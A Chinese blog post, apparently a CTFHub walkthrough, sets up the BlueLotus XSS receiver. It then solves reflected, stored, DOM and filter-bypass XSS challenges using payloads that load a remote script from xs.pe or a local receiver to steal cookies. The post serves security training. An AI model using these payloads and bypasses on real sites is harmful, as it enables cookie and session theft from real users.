当前位置: 首页 > news >正文

网站建设客户案例强大的wordpress 二次开发

网站建设客户案例,强大的wordpress 二次开发,邵阳经开区网站,山东已经宣布封城的城市一、搭建XSS平台 安装 1、我这里安装在本地的Phpstudy上,安装过程就是一路下一步(可以改安装路径),附上下载链接: # 官网:https://www.xp.cn/download.html# 蓝莲花 - github下载 https://github.com/fi…

一、搭建XSS平台

安装

1、我这里安装在本地的Phpstudy上,安装过程就是一路下一步(可以改安装路径),附上下载链接:

# 官网:https://www.xp.cn/download.html# 蓝莲花 - github下载
https://github.com/firesunCN/BlueLotus_XSSReceiver

phpstudy安装完成后启动服务

将解压后的BlueLotus_XSSReceiver原代码放置 phpstudy 安装目录的WWW文件夹

 然后在浏览器中输入:http://本机ip/BlueLotus_XSSReceiver-master   #  访问我们刚才拉到www文件夹下的BlueLotus_XSSReceiver文件,进入安装界面

2、配置XSS接收平台 - 蓝莲花

插入模板

填写接收数据的url ,格式:当前蓝莲花平台的url + 文件名(文件名自己取)

示例

最后选择生成paload

测试一下

3、将攻击语句复制保存下来,等下要用

<script src="http://127.0.0.1/BlueLotus_XSSReceiver-master/myjs/text.js"></script>

攻击演示

本地演示

突然想到一个问题,我刚才制作的攻击语句中的IP是本地的回环地址,所以如果我在虚拟机的靶场中测试攻击,那么我的蓝莲花平台是接收不到的,所以这里先在本地的靶场测试,等下在演示在虚拟机中的(如果蓝莲花平台部署在云服务器,就能攻击其他互联网用户)

解除输入框的字符限制

回到平台查看攻击

点击查看邮件信息 

虚拟机演示

ipconfig    # 查看本机ip

使用本机IP访问蓝莲花平台测试看看

重新构造攻击paload

<script src="http://192.168.100.58//BlueLotus_XSSReceiver-master/myjs/text.js"></script>

回到平台

二、反射型

(1)首先尝试用蓝莲花xss平台打cookie;但是不知道哪个步骤出现问题;老是获取不了cookie
示例:
payload:

image


获取响应:

image


结果:(就是没有cookie;不知道哪个环境出现问题)

image


(2)尝试了大佬的在线xss平台;成功了。自己重新搭建了一个另一个xss平台也成功拿到flag;需要在docker容器搭建,不演示了);但是蓝莲花的这个问题一直没有被解决;就是很垃圾!

在线xss平台:https://xssaq.com/(该平台主机上线有提示语音并且功能比蓝莲花和我搭建的另一个xss平台都好,所以就借助大佬搭建的xss平台作为本期演示平台)
成功拿到flag

image

三、存储型

(1)将payload上传到第一个输入框

image


此时主机上线不携带cookie

image


将url输入到第二个输入框;xss平台提示上线成功,此时携带cookie

image


还能看到当前的网页截屏

image

四、DOM反射

(1)首先插入<script>alert(1)</script>,发现攻击不成功,而返回的是;我们查看源码发现需要构造闭合

image


'></script><script>alert(1)</script>
发现成功了!

image


构造payload'></script><sCRiPt sRC=//xs.pe/cqW></sCrIpT>,获取flag

image

五、DOM跳转

(1)首先尝试,不成功;尝试构造js语句
http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800?jumpto=javascript:alert(1)
发现成功了,那么直接使用xss平台获取cookie
http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/?jumpto=javascript:$.getScript("//xs.pe/cqW")
拿到flag

六、过滤空格

(1)使用paylod发现空格被过滤了<sCRiPt sRC=//xs.pe/cqW></sCrIpT>
(2)直接使用/**/代替空格即可绕过

<sCRiPt/**/sRC=//xs.pe/cqW></sCrIpT> 

image


拿到flag

image

七、过滤关键词

(1)正交提交脚本测试发现将scr开头的单词全部替换为空

image


(2)尝试了双写;不行;那就尝试一下大小写吧;好像可以;直接注入payload拿到flag

image

http://www.yayakq.cn/news/762081/

相关文章:

  • 可以做360度全景图的网站北京seo关键词排名优化软件
  • 做地方门户网站不备案可以吗wordpress更改底部
  • 企业网站需求方案wordpress is tag
  • 宁波网站优化平台做毕设最常去的几个网站
  • 网站建设评审聊城质量最好网站建设
  • php网站开发实施方案android系统app开发
  • 好用的快速网站建设平台seo优化网站建设哪家好
  • com域名注册情况昆明优化广告公司
  • 上海网站建设永灿14年品牌网站建设光盘
  • 展示型网站设计案例图片制作成动态视频
  • 一元夺宝网站开发劳务派遣做网站有必要吗
  • 重庆百度网站排名wordpress 浏览次数插件
  • 摄影网站设计图片做一个公司的网站应做哪些准备工作
  • 制作电子商务网站腾讯企业邮箱电脑版
  • 廊坊建站住房和城乡建设局是干什么的
  • 随州做网站公司做婚恋网站要多少钱
  • 门户网站建设谈判建设网站的网站公告是什么
  • 建网站一般需要多少钱wordpress文章不显示
  • 手机网站建设哪家强中山本地网站建设
  • 梅州生态建设有限公司网站wordpress有什么局限性
  • seo网站的锚文本怎么写百度下载并安装
  • django电影网站开发苏州兼职网站开发
  • 公司网站建设申请单网站开发与调试实验报告
  • 58接网站建设找app开发公司
  • wordpress更新文章post.php错误优化设计答案大全
  • 湖南电子科技网站建设在线图片编辑像素
  • 一个网站两个数据库网页游戏排行榜前十名360
  • 德州市住房和城乡建设局网站网站备案 快速
  • 广东企业网站制作wp网站建设模板
  • 站长统计软件江西网站建设销售电话